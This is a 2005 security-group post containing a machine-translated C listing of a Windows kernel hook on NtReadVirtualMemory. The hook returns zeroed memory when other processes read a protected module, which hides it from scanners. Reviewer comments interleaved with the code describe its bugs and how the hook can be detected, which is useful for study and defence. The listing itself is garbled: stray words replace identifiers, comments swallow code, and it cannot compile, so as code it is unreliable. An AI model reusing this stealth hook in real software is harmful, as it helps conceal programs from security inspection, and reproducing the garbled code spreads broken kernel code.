Author: Polymorphours
Email: Polymorphours@whitecell.org
Homepage: http://www.whitecell.org
Date: 2005-11-17
/* ++ Author: PolymorphoursDate: 2005/1/10 through the NtReadVirtualMemory hook, to prevent other processes from scanning the protected module. If other processes are found to read the memory of the protected module, 0 -- */ /* NOTE(review): this listing is a machine translation that also mangled identifiers and collapsed line breaks. The struct tag below, the function name and its first parameter ("interrupt (response, ..."), the local declarations "interrupt; wait; temperature" and the calls rendered as "values", "couldn t (prediction_execute_handler)", "terminate" and "(optional)" are dictionary words standing in for C identifiers, and the "//" comments now swallow the code that follows them on the same line, so the text is not compilable as printed. The struct is the loader's LDR_DATA_TABLE_ENTRY (the body later uses sizeof(LDR_DATA_TABLE_ENTRY) and PLDR_DATA_TABLE_ENTRY casts); on the 32-bit layout the Ptr32 annotations imply, the members as declared occupy 0x2c bytes, yet the trailing offset comment resumes at +0x034, so one 8-byte member (presumably a third LIST_ENTRY) appears to have been lost in transcription. The garbled locals are, from their later use, PPEB_LDR_DATA PebLdrData, the two PLDR_DATA_TABLE_ENTRY cursors LdrDataTableHeadList / LdrDataTableEntry, and the BOOLEAN bHideFlag initialised to FALSE. Verify every name against the original source before relying on it. */ typedef struct _ expect {LIST_ENTRY InLoadOrderLinks; LIST_ENTRY comment; PVOID DllBase; PVOID EntryPoint; ULONG SizeOfImage; UNICODE_STRING FullDllName; UNICODE_STRING BaseDllName; /* + 0x034 Flags: Uint4B + 0x038 LoadCount: Uint2B + 0x03a TlsIndex: Uint2B + 0x03c HashLinks: _ LIST_ENTRY + 0x03c SectionPointer: Ptr32 Void + 0x040 CheckSum: uint4B + 0x044 TimeDateStamp: Uint4B + 0x044 LoadedImports: Ptr32 Void + 0x048 handle: Ptr32 Void + 0x04c PatchInformation: Ptr32 Void */} Handle, * handle; /* ++ function name: MyNtReadVirtualMemory parameter: INHANDLEProcessHandle, INPVOIDBaseAddress, OUTPVOIDBuffer, INULONGBufferLength, feature: hides the memory of the protection module. If any memory is found to scan this memory, then, the encrypted data is returned during the scanning process: NTSTATUS -- */ /* MyNtReadVirtualMemory: replacement for the NtReadVirtualMemory service. Parameters (garbled in the signature below): IN HANDLE ProcessHandle, IN PVOID BaseAddress, OUT PVOID Buffer, IN ULONG BufferLength, and the OUT PULONG ReturnLength rendered as "timeout" (the body dereferences it as ReturnLength). Returns NTSTATUS. Behaviour as written: resolve ProcessHandle to its EPROCESS, attach to that process, walk its PEB->Ldr InLoadOrderModuleList, and for the module whose image range overlaps [BaseAddress, BaseAddress + BufferLength) consult the ProtectFile list; when the module's FullDllName matches a ProtectName the caller's Buffer is zero-filled, BufferLength is reported as read and STATUS_SUCCESS is returned. Every other read, and every failure path, is forwarded to the original service at CLEANUP. Note the header comment above says "encrypted data": the code returns zeros (memset 0x00). Defensive relevance: a read of mapped image pages that comes back all-zero with ReturnLength == BufferLength is the observable artifact of this hook; comparing the returned bytes with the on-disk image, or reading through a path that does not traverse this service, exposes it, and the hard-coded PebOffset and +0xc Ldr offset make the hook version-specific. */ interrupt (response, INPVOIDBaseAddress, OUTPVOIDBuffer, INULONGBufferLength, timeout) {NTSTATUSstatus; PEPROCESSeProcess; PVOIDPeb; interrupt; wait; PLIST_ENTRYBlink; PPROTECT_NODEFileNode = NULL; temperature = FALSE; ULONGImageMaxAddress = 0;/* # ifdef _ debugdbuplint ("Call Process: % s, BaseAddress: % 08x \ n", PsGetProcessImageFileName (
PsGetCurrentProcess (), BaseAddress); # endif */ /* "values" is the garbled name of the handle-to-object lookup; its argument list (handle, FILE_READ_DATA, PsProcessType, KernelMode, &eProcess, NULL) matches ObReferenceObjectByHandle, but confirm against the original. The access mode is forced to KernelMode rather than the caller's previous mode. The matching release appears later as ObDereferenceObject (and, garbled, as "terminate"). */ status = values (ProcessHandle, FILE_READ_DATA, PsProcessType, KernelMode, (PVOID) & eProcess, NULL); if (NT_SUCCESS (status )) {// obtain the PEB address // Peb = (PVOID) (* (PULONG) (PCHAR) eProcess + PebOffset )); //// switch to the target process space // KeAttachProcess (eProcess); //// determine whether PEB is valid. If yes, then, use the PEB structure to traverse the modules loaded by the process. // if (! MmIsAddressValid (Peb) {/* # ifdef _ debugdbuplint ("PEB is error. \ n "); # endif */KeDetachProcess (); ObDereferenceObject (eProcess); goto CLEANUP;} /* NOTE(review): Peb (read from EPROCESS + PebOffset, an offset defined outside this listing) was only checked with MmIsAddressValid, and this read of Peb + 0xc happens before the try block begins, so a PEB page that becomes invalid between the check and the read faults outside the handler; the try that follows only guards the list walk. "peb" is a case-mangled Peb. */ PebLdrData = (PPEB_LDR_DATA) (* (PULONG) (PCHAR) peb + 0xc); if (! PebLdrData) {KeDetachProcess (); ObDereferenceObject (eProcess); goto CLEANUP;} try {ProbeForRead (PebLdrData, sizeof (PEB_LDR_DATA), sizeof (ULONG )); /// traverse the module linked list // LdrDataTableHeadList = (PLDR_DATA_TABLE_ENTRY) PebLdrData
-> InLoadOrderModuleList. Flink; LdrDataTableEntry = LdrDataTableHeadList; /* walk the in-load-order list. The loop starts at the first real entry and stops when it gets back to it, so the sentinel LIST_ENTRY embedded in PEB_LDR_DATA is also visited as if it were a module entry; its DllBase slot is not a module base, and the !DllBase guard below is presumably what is meant to skip it (confirm). Each node is probed because it lives in the target's user address space. */ do {ProbeForRead (LdrDataTableEntry, sizeof (LDR_DATA_TABLE_ENTRY), sizeof (ULONG); if (! LdrDataTableEntry-> DllBase) {LdrDataTableEntry = (PLDR_DATA_TABLE_ENTRY) LdrDataTableEntry
-> InLoadOrderLinks. flink; continue;} //// determine which module the Read Memory belongs to. If none of them belong to, run the following command: // ImageMaxAddress = (ULONG) ldrDataTableEntry-> DllBase +
LdrDataTableEntry-> SizeOfImage); if (ULONG) BaseAddress + BufferLength) <
(ULONG) LdrDataTableEntry-> DllBase | (ULONG) BaseAddress> ImageMaxAddress) { /* overlap test: the entry is skipped when the read ends below DllBase or starts above ImageMaxAddress. ImageMaxAddress is DllBase + SizeOfImage, one past the image, so a read starting exactly there is still treated as inside; the 32-bit BaseAddress + BufferLength sum can wrap for ranges near the top of the address space and then compare as "below DllBase". The "|" is a bitwise OR of two comparison results, which yields the same truth value as || here but is easy to misread. */ // if it is not a read module area, enumerate the next // LdrDataTableEntry = (PLDR_DATA_TABLE_ENTRY) LdrDataTableEntry->
InLoadOrderLinks. Flink; continue;} /* the read overlaps this module: walk the global ProtectFile list backwards via Blink and test whether the module's full path occurs inside a configured ProtectName. NOTE(review): wcsstr(FileNode->ProtectName, FullDllName.Buffer) treats the UNICODE_STRING buffer as NUL-terminated, which the type does not guarantee, and the compare is not bounded by FullDllName.Length; the buffer is read while still attached to the target, inside the try. */ // If the module is protected, FALSE data is returned // bHideFlag = FALSE; Blink = ProtectFile. Blink; while (Blink! = & ProtectFile) {FileNode = CONTAINING_RECORD (Blink, PROTECT_NODE, ActiveLink); // if the current file is found to exist in the hidden list, set the hidden flag to hide it. // if (wcsstr (FileNode-> ProtectName, Ldr
DataTableEntry-> FullDllName. buffer) {bHideFlag = TRUE; break;} Blink = Blink-> Blink;} /* hide path: detach from the target and drop the EPROCESS reference first, because Buffer and ReturnLength belong to the calling process; then zero-fill the caller's buffer and report the full length as read. ProbeForWrite(ReturnLength, ...) is issued with no NULL check although the native service's length argument is optional (per its documented signature, confirm); a NULL raises into the except block below, which, with bHideFlag already TRUE, skips the second detach/dereference and forwards the call to the original service, so that read is then answered with the real bytes. */ if (bHideFlag) {// return the original process space for processing // KeDetachProcess (); ObDereferenceObject (eProcess); ProbeForWrite (Buffer, BufferLength, sizeof (ULONG); memset (Buffer, 0x00, BufferLength); ProbeForWrite (ReturnLength, sizeof (PULONG), sizeof (ULONG); * ReturnLength = BufferLength; return STATUS_SUCCESS;} LdrDataTableEntry = (optional) LdrDataTableEntry
-> InLoadOrderLinks. Flink;} while (LdrDataTableEntry! = LdrDataTableHeadList);} /* "couldn t (prediction_execute_handler)" is the garbled except(EXCEPTION_EXECUTE_HANDLER); "terminate" here and below is presumably ObDereferenceObject, paired with KeDetachProcess exactly as on the earlier error paths, and "BHideFlag" is a case-mangled bHideFlag. On a fault during the probes or the list walk, the attach and the reference are undone unless the hide path already did so, then control falls through to the original service. */ couldn t (prediction_execute_handler) {if (! BHideFlag) {KeDetachProcess (); terminate (eProcess);} goto CLEANUP;} KeDetachProcess (); terminate (eProcess);} /* CLEANUP: everything that is not hidden, including the lookup failure, the invalid PEB/Ldr cases and faults, is forwarded to NtReadVirtualMemory, which here must be the saved pointer to the original service (declared outside this listing), otherwise the call would recurse into this hook. "returnLength" is the case-mangled ReturnLength. */ CLEANUP: return NtReadVirtualMemory (ProcessHandle, BaseAddress, Buffer, BufferLength, returnLength );}
WSS (Whitecell Security Systems) is a non-profit civil technology organization dedicated to research on various system security technologies. It adheres to the traditional hacker spirit and pursues pure technology.
WSS home: http://www.whitecell.org/
WSS Forum: http://www.whitecell.org/forums/